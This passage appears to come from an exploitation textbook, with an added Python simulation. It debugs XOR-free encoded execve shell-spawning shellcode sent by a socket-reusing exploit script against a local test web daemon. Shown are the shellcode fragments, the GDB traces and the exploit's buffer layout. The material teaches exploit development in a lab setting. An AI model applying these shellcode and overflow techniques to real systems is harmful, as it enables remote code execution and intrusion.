push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
The decoding loop uses the EDX register as a counter. It begins at 8
and counts down to 0, since 8 bytes need to be decoded. Exact stack addresses
don't matter in this case since the important parts are all relatively addressed,
so the output below doesn't bother attaching to an existing tinywebd process.
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out
warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon..
Since the breakpoints are actually part of the shellcode, there is no need
to set one from GDB. From another terminal, the shellcode is assembled and
used with the socket-reusing exploit tool.
From Another Terminal
reader@hacking:~/booksrc $ nasm encoded_sockreuserestore_dbg.s
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_socketreuserestore_dbg 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 313] [shellcode 72] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
Back in the GDB window, the first int3 instruction in the shellcode is hit.
From here, we can verify that the string decodes properly.
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 12400]
0xbffff6ab in ?? ()
(gdb) x/10i $eip
0xbffff6ab: push 0x8
0xbffff6ad: pop edx
0xbffff6ae: sub BYTE PTR [ebx+edx],0x5
0xbffff6b2: dec edx
0xbffff6b3: jns 0xbffff6ae
0xbffff6b5: int3
0xbffff6b6: xor edx,edx
0xbffff6b8: push edx
0xbffff6b9: mov edx,esp
0xbffff6bb: push ebx
(gdb) x/8c $ebx
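As an added illustration that is not part of the book's code, the following Python snippet simulates the decoding loop shown in the disassembly above. It assumes the encoder added 0x5 to every byte (inferred from the `sub BYTE PTR [ebx+edx],0x5` instruction) and that the string being decoded is "/bin//sh" with its NUL terminator, as the execve comment states; running it shows that counting EDX from 8 down through 0 with `jns` also decodes the terminator byte, which is why the encoded payload itself can be free of null bytes.

```python
# Added example (not from the book): simulate the x86 decoding loop.
# Assumptions: the encoder added 0x5 to each byte (inferred from the
# `sub BYTE PTR [ebx+edx],0x5` instruction), and the decoded string is
# "/bin//sh" followed by a NUL terminator, as the execve comment says.

ENCODE_KEY = 0x5
TARGET = b"/bin//sh\x00"  # 8 characters + NUL terminator = 9 bytes


def encode(plain: bytes, key: int = ENCODE_KEY) -> bytes:
    """Mirror the encoder: add KEY to every byte (mod 256) so the payload
    contains no 0x00, which a string-based copy would treat as the end."""
    return bytes((b + key) & 0xFF for b in plain)


def decode_like_loop(buf: bytearray, key: int = ENCODE_KEY, start: int = 8) -> int:
    """Replicate the loop literally:
        push 0x8 / pop edx            ; edx = start
        sub BYTE PTR [ebx+edx], key   ; decode one byte in place
        dec edx
        jns loop                      ; repeat while edx is still >= 0
    Returns the number of iterations, which shows that "counting down
    to 0" with jns touches indices start..0 inclusive (nine bytes)."""
    edx = start
    iterations = 0
    while True:
        buf[edx] = (buf[edx] - key) & 0xFF
        iterations += 1
        edx -= 1
        if edx < 0:  # dec set the sign flag, so jns falls through
            break
    return iterations


def has_null(data: bytes) -> bool:
    return b"\x00" in data


def demo():
    """Encode the target, decode it the way the shellcode does, and
    return (encoded bytes, decoded bytes, iteration count)."""
    encoded = encode(TARGET)
    buf = bytearray(encoded)
    n = decode_like_loop(buf)
    return encoded, bytes(buf), n


if __name__ == "__main__":
    enc, dec, n = demo()
    print("encoded:", enc.hex(), "null-free:", not has_null(enc))
    print("decoded:", dec, "iterations:", n)
```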